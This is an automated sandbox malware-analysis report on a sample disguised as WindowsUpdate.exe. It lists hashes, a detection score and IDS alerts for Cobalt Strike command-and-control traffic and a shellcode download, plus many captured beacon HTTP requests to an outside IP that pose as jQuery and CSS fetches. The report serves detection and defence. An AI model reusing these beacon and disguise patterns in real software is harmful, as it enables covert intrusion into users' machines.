Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
WindowsUpdate.exe

Overview

General Information

Sample name:WindowsUpdate.exe
Analysis ID:1577955
MD5:375049ae392572882d3402d0678389ef
SHA1:a3534e4451f28d4162e2d39dd70ef7b4496d4807
SHA256:7d598c046110849932052e38c67071473753e809cb5d55d2223226e810b1475a
Tags:exeuser-smica83
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Program does not show much activity (idle)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • WindowsUpdate.exe (PID: 6652 cmdline: "C:\Users\user\Desktop\WindowsUpdate.exe" MD5: 375049AE392572882D3402D0678389EF)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-18T22:52:03.210751+010020287653Unknown Traffic192.168.2.449731146.56.219.146443TCP
2024-12-18T22:52:07.200084+010020287653Unknown Traffic192.168.2.449732146.56.219.146443TCP
2024-12-18T22:52:14.771106+010020287653Unknown Traffic192.168.2.449733146.56.219.146443TCP
2024-12-18T22:52:21.964454+010020287653Unknown Traffic192.168.2.449736146.56.219.146443TCP
2024-12-18T22:52:29.287463+010020287653Unknown Traffic192.168.2.449741146.56.219.146443TCP
2024-12-18T22:52:36.776166+010020287653Unknown Traffic192.168.2.449742146.56.219.146443TCP
2024-12-18T22:52:44.382950+010020287653Unknown Traffic192.168.2.449743146.56.219.146443TCP
2024-12-18T22:52:51.956452+010020287653Unknown Traffic192.168.2.449744146.56.219.146443TCP
2024-12-18T22:52:59.510929+010020287653Unknown Traffic192.168.2.449746146.56.219.146443TCP
2024-12-18T22:53:06.936853+010020287653Unknown Traffic192.168.2.449763146.56.219.146443TCP
2024-12-18T22:53:14.336190+010020287653Unknown Traffic192.168.2.449779146.56.219.146443TCP
2024-12-18T22:53:21.968112+010020287653Unknown Traffic192.168.2.449799146.56.219.146443TCP
2024-12-18T22:53:29.435887+010020287653Unknown Traffic192.168.2.449816146.56.219.146443TCP
2024-12-18T22:53:36.668368+010020287653Unknown Traffic192.168.2.449835146.56.219.146443TCP
2024-12-18T22:53:43.978487+010020287653Unknown Traffic192.168.2.449853146.56.219.146443TCP
2024-12-18T22:53:51.218394+010020287653Unknown Traffic192.168.2.449869146.56.219.146443TCP
2024-12-18T22:53:58.505604+010020287653Unknown Traffic192.168.2.449886146.56.219.146443TCP
2024-12-18T22:54:05.618971+010020287653Unknown Traffic192.168.2.449905146.56.219.146443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-18T22:52:07.947770+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449732TCP
2024-12-18T22:52:15.525510+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449733TCP
2024-12-18T22:52:22.696537+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449736TCP
2024-12-18T22:52:30.023519+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449741TCP
2024-12-18T22:52:37.532557+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449742TCP
2024-12-18T22:52:45.142764+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449743TCP
2024-12-18T22:52:52.708825+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449744TCP
2024-12-18T22:53:00.248345+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449746TCP
2024-12-18T22:53:07.673380+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449763TCP
2024-12-18T22:53:15.082077+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449779TCP
2024-12-18T22:53:22.780642+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449799TCP
2024-12-18T22:53:30.195703+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449816TCP
2024-12-18T22:53:37.399876+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449835TCP
2024-12-18T22:53:44.714622+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449853TCP
2024-12-18T22:53:51.994563+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449869TCP
2024-12-18T22:53:59.239615+010020330091Malware Command and Control Activity Detected146.56.219.146443192.168.2.449886TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-18T22:52:04.652742+010020354421A Network Trojan was detected146.56.219.146443192.168.2.449731TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: WindowsUpdate.exeReversingLabs: Detection: 13%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.0% probability
Source: WindowsUpdate.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: unknownHTTPS traffic detected: 146.56.219.146:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: WindowsUpdate.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\admin\Desktop\Ulfberht-main\Ulfberht-main\src\x64\Release\Ulfberht.pdb source: WindowsUpdate.exe
Source: Binary string: C:\Users\admin\Desktop\Ulfberht-main\Ulfberht-main\src\x64\Release\Ulfberht.pdb## source: WindowsUpdate.exe
Source: C:\Users\user\Desktop\WindowsUpdate.exeCode function: 4x nop then xor eax, eax0_2_00000217700B0B84

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49744
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49733
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49736
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49732
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49742
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49763
Source: Network trafficSuricata IDS: 2035442 - Severity 1 - ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1 : 146.56.219.146:443 -> 192.168.2.4:49731
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49746
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49816
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49779
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49799
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49741
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49886
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49835
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49743
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49853
Source: Network trafficSuricata IDS: 2033009 - Severity 1 - ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile Response : 146.56.219.146:443 -> 192.168.2.4:49869
Source: Joe Sandbox ViewASN Name: CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa
Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49731 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49733 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49732 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49736 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49744 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49743 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49741 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49746 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49742 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49763 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49779 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49799 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49835 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49816 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49853 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49869 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49886 -> 146.56.219.146:443
Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49905 -> 146.56.219.146:443
Source: global trafficHTTP traffic detected: GET /res/js/jquery-3.6.2.slim.min.js HTTP/1.1Accept: */*Content-Language: de-DE, en-CAUser-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: unknownTCP traffic detected without corresponding DNS query: 146.56.219.146
Source: global trafficHTTP traffic detected: GET /res/js/jquery-3.6.2.slim.min.js HTTP/1.1Accept: */*Content-Language: de-DE, en-CAUser-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /assets/code-3d7b701fc6eb.css HTTP/1.1Accept: */*Content-Language: de-DE, en-CACookie: SESSIONID=Kc01eAbdRHb9U2QSQjyhjBzp8wpgpWi0WoW2o0mJHNpt++RXy2N1dW8vFiYB7dYGdX3BcAwwZyvWBh+JFOCF8x5OSlLRiJHSB2gqQOLpR/9CZIJ4RysR0EjhWLeLSgoZOq+//1c7BsaejloBxcA9OnF8Yk+2o9seJUpnTPZkQiY=User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)Host: 146.56.219.146Connection: Keep-AliveCache-Control: no-cache
